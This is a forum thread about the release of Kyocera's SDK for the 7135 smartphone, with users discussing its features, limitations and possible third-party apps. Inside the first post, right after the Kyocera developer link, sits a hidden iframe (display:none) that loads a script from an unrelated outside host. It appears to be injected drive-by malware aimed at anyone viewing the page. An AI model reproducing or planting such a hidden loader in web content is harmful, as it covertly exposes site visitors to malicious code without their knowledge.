+ Reply to Thread

Thread: SDK available!

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar

Attention programmers: SDK available!

Attention programmers:
    Enjoy!
    http://www.kyocera-wireless.com/7100_phone/7135/developers/7135_developers.htm<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

YES!!! Thanks for pointing this out. I had stopped obsessivly checking the web site every six hours and might not have seen this until Monday. Now I know what I am doing this weekend......

Alan

Cool, now does anyone know where we can find the ROM image for the 7135? (seeing as how i am still waiting for Verizon to release the actual phone)

--Mark

I just did a quick once over on the SDK documentation, and can answer a couple of questions that have been asked here before.

1) The SDK does not supply any interface to the GPS location data. Looks like we are going to need to rely on the carriers for location based services

2) There are commands for controlling MP3 play for both MP3's on the SD card and the MP3 database files saved as ringers, flip sounds, etc.... The one command I was hoping to see that is missing is the ability to start MP3 play from a particular point in the file (either by bytes or time), so it looks like we can't write an MP3 player that supports Fast Forward/Rewind functions.

3) SDIO is supported, but you are directed to Palm's documentation on SDIO and VFS programming. There are no commands for redirecting the voice path on the phone to the SDIO slot, so our dreams of using Bluetooth Headsets or Bluetooth Car Kits without some kind of adapter are not going to become reality.

4) The SDK DOES provide program access to ALL of the hard keys, including the numeric keys, backlight key, the OK butto, the volume keys, etc... We could probably do some interesting stuff with that.

That's all from the quick look.

Alan

Originally posted by madone
    Cool, now does anyone know where we can find the ROM image for the 7135? (seeing as how i am still waiting for Verizon to release the actual phone)

--Mark
    It is a violation of the license agreement of the Rom image program to provide the Rom image to another user. Otherwise I would make one of my phone and post it here.....

Alan

So what kind of 3rd party programs do you think we can reasonably anticipate now that the SDK is out? One thing I would definitely be interested in would be a TV tuner or a Radio tuner on an SDIO card.

7135 SDK available now ...

Kids:

Thought you'd be interested in hearing that the Kyocera SDK for the 7135 has been posted on their site.

Jazz ... I think you should have a contest for 7135 apps here!

Now -- let's see how many of us it takes to bring traffic to on their site to a halt due to all the downloads!

3) SDIO is supported, but you are directed to Palm's documentation on SDIO and VFS programming. There are no commands for redirecting the voice path on the phone to the SDIO slot, so our dreams of using Bluetooth Headsets or Bluetooth Car Kits without some kind of adapter are not going to become reality.

Say it ain't so joe

Does Kyo have to come up with additional programing? Or a third party programer? I'm not much of a programer, but would just like some clarifation as to the feasability of this phone having a bt headset w/o an adapter...

My first modification request:

... to you bold programmers is hard key mapping for the MP3 player when it is the active screen. I hate getting out the sylus to FF or pause. Is that feasible, easy, or hard?

Re: My first modification request:

You can't modify an existing application.

Originally posted by Sethster
    ... to you bold programmers is hard key mapping for the MP3 player when it is the active screen. I hate getting out the sylus to FF or pause. Is that feasible, easy, or hard?

Re: Re: My first modification request:

Originally posted by rlwhitt
    You can't modify an existing application.
    But we could write our own MP3 player which utilizes the hard keys, as well as the phone volume keys to control MP3 volume or FF/RW. Fairly big project, but someone will take it on.... Maybe even me.

Alan

7135 emulator skins

Does anyone know where to down load the emulator skin for the 7135?